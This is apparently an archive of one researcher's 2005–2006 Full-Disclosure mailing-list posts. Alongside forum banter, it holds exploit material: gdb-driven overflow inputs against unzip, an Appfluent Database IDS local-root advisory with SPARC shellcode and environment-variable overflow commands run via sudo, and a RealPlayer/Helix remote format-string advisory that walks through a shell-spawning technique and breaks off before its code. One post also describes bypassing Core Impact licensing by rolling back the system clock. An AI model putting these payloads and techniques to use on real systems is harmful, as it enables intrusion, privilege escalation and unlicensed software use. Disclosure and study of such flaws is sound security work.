c0ntex


Re: [Full-disclosure]POSITIF-securityframework

2006-01-27 Thread c0ntex
On 27/01/06, POSITIF [EMAIL PROTECTED] wrote:
 Hello,

  We would like to present the POSITIF project to all
  Full-disclosure members.


http://www.positif.org/iwhat.html

7 Million Euros. Happy new year!

--

regards
c0ntex


Re: [Full-disclosure] private imap4d exploit

2006-01-23 Thread c0ntex
On 23/01/06, J.A. Terranson [EMAIL PROTECTED] wrote:

  No, it was mine!
 
   printf([!] mailutils imapd4d universal(?) exploit 0.5 by c0ntex\n);

 Yet, I found *this* in my older files:

  printf([!] mailutils imapd4d universal(?) exploit 0.5 by n3td3v\n);

 Will the REAL code thief, please stand up?

lol

--

regards
c0ntex


Re: [Full-disclosure] private imap4d exploit

2006-01-22 Thread c0ntex
On 22/01/06, crash-x gay [EMAIL PROTECTED] wrote:
 Don't lie crash-x we all know you ripped the code off rave and changed the
 printf()'s to make it look like yours. You even admit to changing it again
 now!!!

  ravecool wrote this code - crash-x is a code thief!!! rave deserves the
 credit for this exploit as he is the real hacker here.


No, it was mine!

 printf([!] mailutils imapd4d universal(?) exploit 0.5 by c0ntex\n);


regards
c0ntex


Re: [Full-disclosure] Re: what we REALLY learned from WMF

2006-01-06 Thread c0ntex
On 06/01/06, Gadi Evron [EMAIL PROTECTED] wrote:
 I am just saying that we as an industry got used to False Positives,
 slow responses, etc. We should demand more and this situation proved it
 is possible.

I doubt your industry had anything to do with it. Someone running a
cost-out project probably discovered they could save a few 100k by
reducing support requests via call centers and email bandwidth if they
dropped it, and in return got themselves a nice PM / consolidation job
with an office, a view and a parking space..

--

regards
c0ntex


[Full-disclosure] Unzip *ALL* verisons ;))

2005-12-19 Thread c0ntex
Just to add to the pot, this little bug has been there a long time,
mmm, around 2+ yrs. Any apps calling unzip? Any unzip archives with
rather large files?

;)

[EMAIL PROTECTED] tmp]$ gdb -q unzip
(no debugging symbols found)...Using host libthread_db library
/lib/tls/libthread_db.so.1.
(gdb) r `perl -e 'print A x 5000'`
Starting program: /usr/bin/unzip `perl -e 'print A x 5000'`
Reading symbols from shared object read from target memory...(no
debugging symbols found)...done.
Loaded system supplied DSO at 0xe000
(no debugging symbols found)...(no debugging symbols found)...unzip: 
cannot find or open AAA

[snip]

AA.ZIP.
*** glibc detected *** double free or corruption: 0x08075008 ***

Program received signal SIGABRT, Aborted.
0xe410 in __kernel_vsyscall ()
(gdb) bt
#0  0xe410 in __kernel_vsyscall ()
#1  0x002a2955 in raise () from /lib/tls/libc.so.6
#2  0x002a4319 in abort () from /lib/tls/libc.so.6
#3  0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6
#4  0x002dc4ba in free () from /lib/tls/libc.so.6
#5  0x080543a6 in ?? ()
#6  0x08075008 in ?? ()
#7  0x0005 in ?? ()
#8  0x in ?? ()
(gdb) frame 4
#4  0x002dc4ba in free () from /lib/tls/libc.so.6
(gdb) i r
eax0x0  0
ecx0x10b7   4279
edx0x6  6
ebx0x39dff4 3792884
esp0xbfdc2194   0xbfdc2194
ebp0xbfdc21a8   0xbfdc21a8
esi0x39f800 3799040
edi0x8075008134696968
eip0x2dc4ba 0x2dc4ba
eflags 0x200246 2097734
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0  0
gs 0x33 51
(gdb) x/s $edi
0x8075008:   'A' repeats 196 times
(gdb) x/s $esi
0x39f800 main_arena:   \001
(gdb)
0x39f802 main_arena+2: 
(gdb)


gdb) r `python -c 'print \x90 * 5'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close shared object read from target memory: File in
wrong format
Starting program: /usr/bin/unzip `python -c 'print \x90 * 5'`
Reading symbols from shared object read from target memory...(no
debugging symbols found)...done.
Loaded system supplied DSO at 0xe000
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)


--

regards
c0ntex


[Full-disclosure] Re: Unzip *ALL* verisons ;))

2005-12-19 Thread c0ntex
No, it is not an advisory, just adding to ridiculous posts on elog and
excel - anyone can post dumb bugs that have no code or valid use.

--

regards
c0ntex


Re: [Full-disclosure] Unzip *ALL* verisons ;))

2005-12-19 Thread c0ntex
On 19/12/05, Joachim Schipper [EMAIL PROTECTED] wrote

 I cannot reproduce this, either with A x 5000 or A x 2. I tested
 unzip-5.52 on Linux/i386-2.6 and OpenBSD/i386-3.8, and saw no error.

 Joachim



[c0ntex@ ~]$ unzip -v | head -1
UnZip 5.32 of 3 November 1997, by Info-ZIP.  Maintained by Greg Roelofs.  Send
[c0ntex@ ~]$
[c0ntex@ ~]$ uname -a
SunOS  5.8 Generic_117350-24 sun4u sparc SUNW,UltraAX-i2
[c0ntex@ ~]$ unzip `perl -e 'print A x 5'`
Bus Error (core dumped)
[c0ntex@ ~]$


[EMAIL PROTECTED]:~$ unzip -v | head -1
UnZip 5.52 of 28 February 2005, by Info-ZIP.  Maintained by C. Spieler.  Send
[EMAIL PROTECTED]:~$ uname -a
Linux debauch 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
[EMAIL PROTECTED]:~$ unzip `perl -e 'print A x 32000'`
snip
A.ZIP.
error:  zipfile probably corrupt (segmentation violation)
[EMAIL PROTECTED]:~$


[EMAIL PROTECTED] tmp]$ unzip -v | head -1
UnZip 5.51 of 22 May 2004, by Info-ZIP.  Maintained by C. Spieler.  Send
[EMAIL PROTECTED] tmp]$ uname -a
Linux linuxbox 2.6.12 #2 Wed Jul 13 10:19:26 BST 2005 i686 i686 i386 GNU/Linux
[EMAIL PROTECTED] tmp]$ unzip `perl -e 'print A x 5'`
Segmentation fault
[EMAIL PROTECTED] tmp]$

--

regards
c0ntex


Re: [Full-disclosure] Unzip *ALL* verisons ;))

2005-12-19 Thread c0ntex
On 19/12/05, KF (lists) [EMAIL PROTECTED] wrote:
 I'm thinking this is a pretty old school bug... this is damn old code I
 believe. I know it's something I found while working at Snosoft but I
 have no clue whe

DVDMAN's code is pointless. Use the source, luke, and stop watching movies.

--

regards
c0ntex


Re: [Full-disclosure] Unzip *ALL* verisons ;))

2005-12-19 Thread c0ntex
On 19/12/05, KF (lists) [EMAIL PROTECTED] wrote:
 Um... the point was that 3 years ago when I found this (or something
 similar)... the attached exploit worked just fine. I could give a rats
 ass less what you or anyone else does with it today. The bug was pretty
 much pointless to begin with anyway.

 All these folks are talking about not being able to reproduce it... blah
 blah... well all I was saying was that I have seen a /bin/sh prompt
 produced via this issue.

 I'll kindly remove my nose from your uber er33t understanding of this
 crucial unzip overflow.

 -KF

KF, I wasn't having a go at you buddy, I just found the DVDMAN exploit
pretty funny tbh...

toddles back to read Matt. 7:6

--

regards
c0ntex


Re: [Full-disclosure] Someone is running his mouth again... [Hackerattacks in US linked to Chinese military: researchers]

2005-12-15 Thread c0ntex
On 15/12/05, sk / GroundZero [EMAIL PROTECTED] wrote:

 lol this shows how much skill SANS itself got :P who still thinks their
 seminars are any good ? omg
 so that means everything other than script kids is military grade hackers ?
 never heard so much bullshit at once. well unless from n3td3v but that's a
 diff topic..

SANS are teh l33t yo!

Just ask on this list. Everyone who reads this list and has attended a
SANS course works in network security; they admin all those networks
that don't have any! penetrators hiding on their systems. They also
discover all the major flaws in our OS / Applications using all the
advanced exploitation techniques SANS discovered!!

--

regards
c0ntex


Re: [Full-disclosure] certifications

2005-12-08 Thread c0ntex
Don't be blinded by certificates and qualifications, there are many
good hackers and security all-rounders that neither have degrees in CS
nor any form of certification.

It is an illusion that you need to have these to fulfil your desire to
have a security based job. Sure they may help get you in the door of
some place or other, but if you can't get in the door without having a
cert though you specify all your relevant skills / projects on your
CV, then that is probably not a place you want to work at anyway.
*boring, with numerous spare rolls of red tape*

Pitch yourself, sell your talent right, detail your skill sets and how
they match what the company need and you should have no trouble
getting an interview.

--

regards
c0ntex


[Full-disclosure] Appfluent Batabase IDS Local Root

2005-12-07 Thread c0ntex
 /*
  *
  $ An open security advisory #14 - Appfluent Database IDS Environment Variable Overflow
  *
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org
  2: Bug Released: December 07th 2005
  3: Bug Impact Rate: Hi
  4: Bug Scope Rate: Local root
  *
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  *

  Appfluent Database IDS v2.0
  http://www.appfluent.com

  Appfluent Technology is the leading provider of data usage and query performance software designed to
  help IT organizations improve performance of Business Intelligence (BI) and enterprise applications,
  reduce the number of databases they maintain and quickly deploy new applications. Appfluent provides a
  suite of products that clean up and consolidate databases, optimize query performance based on usage,
  and rapidly analyze applications for both test and production environments.

  Appfluent provide a Database IDS system that monitors all SQL traffic in real time, logging every user
  defined transaction to a database, providing an audit trail of all transactions that take place. There
  are several processes that accumulate together to provide the IDS solution, including watcher, analyser,
  alerter and reporter.


  There is a stack based buffer overflow in all binaries that allows for some malicious attacker to gain
  unauthorised code execution on the system where the application is installed. Due to incorrect use of
  strcpy(), and a lack of correct bounds checking, a user can manipulate the $APPFLUENT_HOME environment
  variable to overflow the stack buffer.

  The problem is specific to the watcher process, as it needs to be run as root due to the fact that it
  sniffs all traffic going to an interface. A script installed in $APPFLUENT_HOME/server_oracle/bin is
  supplied so that administrators can run the process via sudo.


  When run with sudo, we are provided a vector for root compromise as a default sudo install on Solaris
  (this example) and other operating systems honour the setting of environment variables. As such, when
  an attacker crafts $APPFLUENT_HOME in a malicious manner and runs the watcher process, root access to
  the system is gained.


  There are a few requirements that need to be met for the attack to be successful, and they include:

  1) User is in the sudoers file and is defined as able to run the watcher process
  2) Sudo honours environment variables, meaning env_reset or the likes is not set

  Please note that users must set, or have $APPFLUENT_HOME set for the product to work, and if the above
  two requirements are met, an attacker is guaranteed to gain unauthorised root access to the system.


  Appfluent have released a fix, which is provided in the latest version of the product = Ver: 2.1.0.103

  ###
  ## Proof run with a default sudo install from sunfreeware.
  ###
  [c0ntex@ ~/vuln]$ export SHELLCODE=`printf
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
  
\x90\x90\x82\x10\x20\x18\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22\x20\x01\x92\x10\x3f
  
\xff\x82\x10\x20\xca\x91\xd0\x20\x08\x82\x10\x20\x2f\x91\xd0\x20\x08\x90\x02\x60\x01
  
\x90\x22\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xcb\x91\xd0\x20\x08\x94\x1a\x80\x0a\x21
  
\x0b\xd5\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23
  
\xbf\xf8\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xfd\xd0\x23\xbf\xec\x92\x23\xa0
  \x14\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08`
  [c0ntex@ ~/vuln]$ export APPFLUENT_HOME=`perl -e 'print A x
576'``printf \xff\xbe
  \xfa\xd0\xff\xbe\xfa\xd0`
  [c0ntex@ ~/vuln]$ sudo /tmp/watch/watcher -sc
  Password:
  Version: 2.0.0.103
  do_process: Exception:
file: file_stream.cpp
line: 338
message: FileStream: fopen :

  
AAA
  
AAA
  
AAA
  
AAA
  
AAA
  
ÿ¾úÐÿ¾úÐ/oracle
  /config/config : 78 : File name too long
code: 78
stack:
  #0  void IC::ConfigFile::load(IC::StrP) at config_file.cpp:35
  #1  virtual void IC::ServerConfig::load() at
/home
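The strcpy() pattern the advisory describes, next to a bounds-checked replacement, as an added example that is not Appfluent's code: the 512-byte buffer and the function names are assumptions for illustration, and the /oracle/config/config suffix is the one visible in the proof run's "File name too long" error.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed for illustration: the product's real buffer size and function
 * names are not known from the advisory.  The suffix is the one visible in
 * the proof run's "File name too long" error. */
#define HOME_BUF       512
#define CONFIG_SUFFIX  "/oracle/config/config"

/* Vulnerable shape from the advisory: strcpy()/strcat() of an environment
 * variable into a fixed-size stack buffer with no bounds check.  main()
 * below only calls it with input already known to fit; with a 576-byte
 * $APPFLUENT_HOME (the advisory's padding) it would overrun the frame. */
static void build_path_unchecked(const char *home, char *path)
{
    strcpy(path, home);                /* overflow point: length never checked */
    strcat(path, CONFIG_SUFFIX);
}

/* Would an $APPFLUENT_HOME of home_len bytes overrun a HOME_BUF-sized
 * buffer in build_path_unchecked()?  Returns 1 if so, else 0. */
int home_would_overflow(size_t home_len)
{
    return home_len + strlen(CONFIG_SUFFIX) + 1 > HOME_BUF;
}

/* Hardened replacement: the destination size travels with the pointer, the
 * write is length-limited, and truncation is an error rather than a silently
 * wrong path.  Returns 0 on success, -1 if the value is missing or too long.
 * Independently of this fix, "Defaults env_reset" in sudoers removes the
 * advisory's second precondition by not passing the variable to root. */
int build_path_checked(const char *home, char *path, size_t path_sz)
{
    if (home == NULL || path == NULL || path_sz == 0)
        return -1;
    int n = snprintf(path, path_sz, "%s%s", home, CONFIG_SUFFIX);
    if (n < 0 || (size_t)n >= path_sz) {
        path[0] = '\0';                /* refuse, do not use a truncated path */
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[HOME_BUF];
    char path2[HOME_BUF];
    const char *home = getenv("APPFLUENT_HOME");

    if (build_path_checked(home, path, sizeof path) != 0) {
        fprintf(stderr, "APPFLUENT_HOME unset or longer than %zu bytes\n",
                (size_t)HOME_BUF - strlen(CONFIG_SUFFIX) - 1);
        return 1;
    }
    printf("config path: %s\n", path);

    /* The checked call above proved the value fits, so the unchecked
     * variant is harmless here; it is shown only to contrast the two. */
    build_path_unchecked(home, path2);
    return strcmp(path, path2) == 0 ? 0 : 1;
}
```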

Re: [Full-disclosure] Re: Google is vulnerable from XSS attack

2005-12-07 Thread c0ntex
For what it is worth, it would be trivial right now to name 10 very
large online presences that have some form of vulnerability, whether
that is XSS, SQL Injection or some other form of web application
quirkiness, it's not really a big deal.

I do however have to agree with ad; it takes far more skill, patience
and devotion to develop some form of code based exploit, by either
controlling a chunk of memory or a vital register which in the end
yields some form of malicious process control than it does to pop an
HTML, JavaScript or SQL string/statement into a field or other input
area.

On 07/12/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 where is your heap overflow ?? (XSS easy targets) ;

 n3td3v wrote:
  Hackers own Google while vulnerabilities remain unpatched. Once they
  patch a vulnerability, they can own me again! Until then... Google is
  in the hands of hackers.
 
  Since you're having a stab at me. Wheres your Google and Yahoo
  vulnerabilities? Naw, you don't have any. You prefer to go looking for
  your SQL injections and cross site scripting in web sites no one has
  ever heard of or cared about before (easy targets).
 
  As the score goes, how many high profile brand names have you found
  vulnerabilities for?
 
  Fancy having a hacking challenge for finding vulnerabilities in major 
  dot-com's?
 
  Lets do it!
 
  On 12/7/05, Morning Wood [EMAIL PROTECTED] wrote:
 
 who owns you? hint: Google ( they own the world )
 
 
 
 




--

regards
c0ntex


Re: [Full-disclosure] Re: Google is vulnerable from XSS attack

2005-12-07 Thread c0ntex
Excuse me, I clicked send too soon

As I was saying, you found a bug, and that's great, well done,
congratulations.

However, at the end of the day that is all it is. A bug, write it off
and end the thread, you have not found the holy grail, you have not
discovered the akashic records on this plane, rather you just found a
silly, yet valid bug in a random web site. Remember that monkeys can
be trained to click a mouse button and paste a 20 letter string in to
a URL.

On 07/12/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 where is your heap overflow ?? (XSS easy targets) ;

 n3td3v wrote:
  Hackers own Google while vulnerabilities remain unpatched. Once they
  patch a vulnerability, they can own me again! Until then... Google is
  in the hands of hackers.
 
  Since you're having a stab at me. Wheres your Google and Yahoo
  vulnerabilities? Naw, you don't have any. You prefer to go looking for
  your SQL injections and cross site scripting in web sites no one has
  ever heard of or cared about before (easy targets).
 
  As the score goes, how many high profile brand names have you found
  vulnerabilities for?
 
  Fancy having a hacking challenge for finding vulnerabilities in major 
  dot-com's?
 
  Lets do it!
 
  On 12/7/05, Morning Wood [EMAIL PROTECTED] wrote:
 
 who owns you? hint: Google ( they own the world )
 
 
 
 




--

regards
c0ntex


[Full-disclosure] SANS Stuff

2005-12-05 Thread c0ntex
I recall an email thread this month relating to boot camps and how
advanced SANS was. After having a look at the Stay Sharp courses, I
see:

Stay Sharp: FAT File System In-Depth
Note: This is an advanced course. Students should already be familiar
with concepts such as a file system and tools such as a hex editor.
While the course does briefly review these concepts, the focus of this
course is on the FAT file system. It is recommended that students
taking this course should prepare by refreshing themselves with the
following concepts:

* Conversion between hexadecimal, decimal, and binary numbers
* Basic concepts of a file system (e.g. files, directories, and
time stamps)


You know what a file is, right? But what about a directory!?

lol

Enrol now and get a 25% discount on:

Stay Sharp: How To Tie Your Shoe laces 

--

regards
c0ntex


Re: [Full-disclosure] SANS Stuff

2005-12-05 Thread c0ntex
On 05/12/05, James Tucker [EMAIL PROTECTED] wrote:

 Er, in your mail you posted content, not a link to the sans pages. I did
 look at your mail. No need to be rude.

I don't recall calling anyone a prat, so perhaps watch your own rude
mouth before speaking.

Anyway, just having a festive giggle to myself and I thought someone
on the list might find it funny. Guess that counts you out  :-)

--

regards
c0ntex


Re: [Full-disclosure] Return of the Phrack High Council

2005-11-26 Thread c0ntex
On 26/11/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 A mirror of the original PHC site:
 http://www.eurocompton.net/~bhb/phrack/

 A mirror of an anti-sec journal (blackhatbloc):

 http://www.eurocompton.net/~bhb/

 el8 magazine:

 http://web.textfiles.com/ezines/EL8/


That's just as funny as it was a couple yrs ago

From: K2 [EMAIL PROTECTED]
To: Lance Spitzner [EMAIL PROTECTED]
Subject: Re: glined

glined is a type of ban off IRC I was glined == I was globally banned
from the undernet

if you connect multiple times to IRC with the same IP (3 or more), you
will be glined (for abuse)

Take care,
K2

--

regards
c0ntex


Re: [Full-disclosure] Return of the Phrack High Council

2005-11-24 Thread c0ntex
On 24/11/05, InfoSecBOFH [EMAIL PROTECTED] wrote:
 Nigga please... 99.99% of this list are whitehat or script kiddie
 which is just as bad.

So, because the majority who use it are white-hat, that now means they
own it? Can I say bollox?

It was once 99.9% used by the black-hat community to release new 0day
and tekniquez, then one day the corporate $$$ machine found it and
started leeching it, now they claim it as theirs?

Many people have their career because of full-disclosure and the
'black-hat' postings.

Credit where it's due.

--

regards
c0ntex


Re: [Full-disclosure] BitchX local root

2005-11-23 Thread c0ntex
Presented below is an exploit for BitchX, a linux IRC client. If the
BitchX binary is installed SetUID (to allow SSL access for non root
users for example), an attacker can exploit a stack overflow and gain
root privileges.

BitchX local root

lies, lies.


On 23/11/05, Sha0lin [EMAIL PROTECTED] wrote:
 Hi,

 1) BitchX is not setuid by default, so is not dangerous bug,
 2) the exploit's date is fake

 you can test the vuln with this exploit:
 http://www.securiteam.com/exploits/6J00B2KBFU.html

 regards,

 Sha0





--

regards
c0ntex


Re: [Full-disclosure] Hacking Boot camps!

2005-11-22 Thread c0ntex
Hmm, there was hands on hacking, but by the company that sold you the
training, it sounds like you got owned by salesman.c.

Blackhat training camps sound pretty good and some of the people are
pretty damn skilled, but these others, Zone-H, Vigilante and the likes,
I would avoid. Blind leading the blind if you ask me.

I'd research who your mentors were before even thinking about signing,

On 22/11/05, K Tucker [EMAIL PROTECTED] wrote:
 Seems that I read from time to time people asking
 about the merits of these hacker boot camps.  It might
 be helpful if I relate my recent experience.  I
 attended a 5 day Hacker boot camp conducted by Intense
 school which is part of Vigilar.  Cost was $3200,
 which I paid out of my own pocket.  The salesman I
 spoke with did a great job selling me on the idea of
 how hands on it was going to be and all the tools
 the instructor was going to show us how to use.
 The classes were supposed to be from 8:30am to 6:00pm
 for the 5 days. The instructor didn't show up until
 4:00 pm due to scheduling conflict.  We only received
 3 hours that day.  The following days started at 9:00
 not 8:30 as advertised which might seem like a small
 thing but at $3200 every minute counts!  The real
 disappointment was the quality of the class. There was
 little actual lab work. 90% of the class was sitting
 while the instructor read from the class manual while
 we looked at a slide of the same page he was reading.
 Sure it was nice to be read things like CAIN and ABEL
 is a good program for sniffing networks, but we in
 the class wanted to know how do you use it!  We were
 never shown. We did have a little hands on lab work
 which involved ethereal and sam spade and netcat. It
 was hard to get them to work because none of our
 vmware was connected to the network correctly so we
 wasted another hour just trying to get that to work!
 The feeling in the class was that the class computers
 should have been set up and ready to go before we even
 arrived. Friday was the big disappointment. The class
 began at 9:00am and they started the CEH examine at
 11:00 am. That test only lasts 3 hours so by 2:00pm
 the school was over!   Most of the class did not take
 the test because we didn't feel ready. 5 people in the
 class did take it and 2 passed it. Those 2 were very
 experienced in network security. The other 3 failed
 it. I have emailed Intense school 4 times with my
 concerns but have never heard back from them. I guess
 they are not too concerned. My feeling is someone
 would do much better to just get the book Hacking
 Exposed and download the suggested tools and play
 with them. You will learn much more and save a lot of
 money!







--

regards
c0ntex


Re: [Full-disclosure] Realplayer security contact address ?

2005-10-06 Thread c0ntex
[EMAIL PROTECTED]

On 06/10/05, Full Disclosure [EMAIL PROTECTED] wrote:
 hey, fd guys

 anybody know security contact realplayer ?
 I have googled and looked for it on their website, but nothing found

 thx



--

regards
c0ntex


Re: [Full-disclosure] Publicly Disclosing A Vulnerability

2005-10-05 Thread c0ntex
Like wind, better out than in.

On 05/10/05, Josh Perrymon [EMAIL PROTECTED] wrote:



 Ok,



 I believe in working with the Vendor to inform them of vulnerable software
 upon finding it in the wild so on…

 But I have a question…



 While performing a pen-test for a large company I found a directory
 traversal vulnerability in a search program—

 I used Achilles and inserted the DT attack in a hidden field and posted it
 to the web server. This returned the win.ini..

 Cool..



 Well… I called the company up and got the lead engineer on the phone.. He
 seemed a little pissed.

 He told me that they found the hole internally a couple months ago but they
 don't want it public and they said I should not tell anyone about it because
 they don't want their customers at risk.



 So I ask the list- what is more beneficial to the customer? Not publicly
 disclosing the risk and hoping that they follow the suggestions of the
 vendor to upgrade?  Or waiting 30 days and send it out?







 Joshua Perrymon

 Sr. Security Consultant

 Network Armor

 A Division of Integrated Computer Solutions

 perrymonj( at )networkarmor.com

 Cell. 850.345.9186

 Office: 850.205.7501 x1104






--

regards
c0ntex

[Full-disclosure] CORE-Impact license bypass

2005-09-26 Thread c0ntex
I seem to have stumbled over a bug in Core Impact
licensing mechanisms that will allow anyone to continually use the
Core Impact product even after the license has expired.

This is not a security issue but it is, I feel, either an oversight or
a feature which can be abused to utilise the Core Impact product for
longer than designed / desired.

In my business funded Core Impact install on this machine, the
license expired at the end of last month and the usual "Your license
has expired" pop-up appears; however, it is easy to re-enable Core to a
working install by merely changing the system date on the PC to say a
month before the product was due to expire. Oops  ;) I guess Core is
using a very simplistic license mechanism.

Emailed CORE two times, 1 week ago, no reply.
--

regards
c0ntex
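The clock-rollback bypass described in this post, shown as an added example that is not Core's code: the naive check that trusts only the local clock, beside a check that keeps a high-water mark of the last clock reading it accepted. `struct lic_state`, `license_ok_naive`, `license_ok_monotonic` and `scenario` are this example's own names, and the expiry timestamp is constructed. The caveat in the comments (persisted state can be wiped by whoever controls the machine) is why a server-side authorisation step is the real fix, not a cleverer local check.

```c
#include <stdint.h>
#include <stdio.h>

/* State a license check persists between runs. In a product this is a file or registry
 * value; here it is a plain struct so the logic can be exercised directly. */
struct lic_state {
    int64_t expires_at;   /* unix time after which the license is invalid */
    int64_t last_seen;    /* highest clock reading ever accepted (high-water mark) */
};

/* The weak form: only the local clock is consulted. Winding the clock back to before
 * expires_at makes an expired license valid again, which is the bypass in the post. */
int license_ok_naive(const struct lic_state *s, int64_t now)
{
    return now < s->expires_at;
}

/* Rollback-aware form: a clock reading earlier than one already seen is treated as
 * tampering, and the mark advances even on a failed check so that having seen the
 * expiry once is remembered. This still trusts the persisted state; whoever controls
 * the machine can delete it, which is why vendors move the decision to a license server. */
int license_ok_monotonic(struct lic_state *s, int64_t now)
{
    if (now < s->last_seen) return 0;     /* clock went backwards */
    s->last_seen = now;
    return now < s->expires_at;
}

/* Replays the post's sequence: a run before expiry, a run after it, then the clock set
 * back a month. Verdicts come back as bits 0..2 (1 = license accepted). */
int scenario(int use_monotonic)
{
    const int64_t day = 86400;
    struct lic_state s = { .expires_at = 1125446400 /* constructed: 31 Aug 2005 */, .last_seen = 0 };
    const int64_t t[3] = { s.expires_at - 10 * day,   /* mid-August: still valid */
                           s.expires_at + 26 * day,   /* late September: expired */
                           s.expires_at - 30 * day }; /* clock rolled back a month */
    int verdicts = 0;
    for (int i = 0; i < 3; i++) {
        int ok = use_monotonic ? license_ok_monotonic(&s, t[i]) : license_ok_naive(&s, t[i]);
        verdicts |= ok << i;
    }
    return verdicts;
}

int main(void)
{
    printf("naive     (valid, expired, rolled back) = 0x%x\n", scenario(0));   /* 0x5 */
    printf("monotonic (valid, expired, rolled back) = 0x%x\n", scenario(1));   /* 0x1 */
    return 0;
}
```

The naive check accepts the rolled-back clock (bit 2 set); the monotonic check refuses it because the expired reading was already recorded as the high-water mark.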


Re: [Full-disclosure] CORE-Impact license bypass

2005-09-26 Thread c0ntex
A 4. version  :-)

On 26/09/05, Morning Wood [EMAIL PROTECTED] wrote:
 been known since at least v3.2
 are you using a 3.x or a 4.x series?
 i believe the 4.x requires an auth from core before use

 - Original Message -
 From: c0ntex [EMAIL PROTECTED]
 To: full-disclosure@lists.grok.org.uk
 Sent: Monday, September 26, 2005 3:30 AM
 Subject: [Full-disclosure] CORE-Impact license bypass


 I seem to have stumbled over a bug in Core Impact
 licensing mechanisms that will allow anyone to continually use the
 Core Impact product even after the license has expired.

 This is not a security issue but it is, I feel, either an oversight or
 a feature which can be abused to utilise the Core Impact product for
 longer than designed / desired.

 In my business funded Core Impact install on this machine, the
 license expired at the end of last month and the usual "Your license
 has expired" pop-up appears, however it is easy to re-enable Core to a
 working install by merely changing the system date on the PC to say a
 month before the product was due to expire. Oops  ;) I guess Core is
 using a very simplistic license mechanism.

 Emailed CORE two times, 1 week ago, no reply.
 --

 regards
 c0ntex



--

regards
c0ntex


[Full-disclosure] RealPlayer HelixPlayer Remote Format String Exploit

2005-09-26 Thread c0ntex
  /*
  ******************************************************************************
  $ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit
  ******************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: September 26th 2005
  3: Bug Impact Rate: Hi
  4: Bug Scope Rate: Remote
  ******************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  ******************************************************************************

  UNIX RealPlayer & Helix Player
  http://real.com
  http://helixcommunity.org

  The Helix Player is the Helix Community's open source media player for consumers. It is being
  developed to have a rich and usable graphical interface and support a variety of open media formats
  like Ogg Vorbis, Theora etc.
  The RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several
  non-open source components including RealAudio/RealVideo, MP3 etc.

  There is a remotely exploitable format string vulnerability in the latest Helix Media Player suite that
  will allow an attacker the possibility to execute malicious code on a victim's computer. The exploit
  code will execute a remote shell under the permissions of the user running the media player, and the
  bug affects all versions of RealPlayer and Helix Player.

  The bug is exploitable by abusing media, including .rp (realpix) and .rt (realtext) file formats.
  Although others may be affected, I stick to the realpix file format for this advisory.

  Almost all media file input is placed on the heap, so it's not possible to just pop our way to a
  supplied string like with a normal stack based format bug; as such we can't directly modify GOT,
  DTORS, etc., leaving us limited in what we can do.

  There are several places where we can control the flow of execution:

    popN     - call *0x04(eax)  - eax is controlled
    popN+N   - call *0x20(eax)  - eax is controlled
    popN+NN  - call *0x100(edx) - edx is controlled
    popN+NNN - ebp              - ebp is controlled
    popN+    - eip              - eip is controlled
   

  However, since we are limited to the size of the value that can be written, it doesn't seem possible to
  point at a known good location directly. Since our shellcode is always mapped via the .rp file between
  0x0822 - 0x082f and, with control of one pointer at a time usually, we cannot reach the LSB, we
  are toast.

  In a Phrack paper, Riq talks about using sections of the base pointer to create a 4 byte pointer by
  chaining EBP like so:

  [Frame 10 EBP]--points to--[Frame 11 EBP]--points to--[Frame 12 EBP]

  And can be manipulated something like so:

      Frame 10        Frame 11        Frame 12
      [LSB|MSB]       [LSB|MSB]--     [41414141]
    1 |           2 |^           3 |__^

  Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP pointing at 0x.

  So what else can I do?

  How about using the fact that the file being played is under my control and only the MSB needs to be
  overwritten. This solves the problem with the size of the value I can write. It is possible to modify
  the MSB of an EBP that is reachable, eventually leading to EIP pointing at some good location after
  mov %ebp,%esp happens, resulting in the execution of our shellcode.

1- Create a file with shellcode address `printf \x37\x13\x12\x08`.rp
2- Overwrite EBP MSB with the address of the file location on the stack
3- EBP is moved to ESP
4- EIP is changed to ESP value
5- EIP is owned, shell is spawned

  Granted, this is not a stable method, as the user can freely manipulate their environment, and we use
  the file name, which is stored in an environment variable, to trampoline us to the shellcode. However
  my goal here is not to create a worm but a proof-of-concept :p

  The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in
  /usr/local/RealPlayer and run as shown below.

  Sample local run:

  Test System: Debian 3.1 against RealPlayer 10.0.5.756 Gold

  Window 1:
  ---------
  [EMAIL PROTECTED]:~$ netstat -an --ip
  Active Internet connections (servers and established)
  Proto Recv-Q Send-Q Local Address           Foreign Address         State
  tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
  tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
  tcp        0      0 192.168.88.133:22       192.168.88.1:2080       ESTABLISHED
  udp        0      0 0.0.0.0:68              0.0.0.0:*
  [EMAIL PROTECTED]:~$ ./helix4real

  Remote format
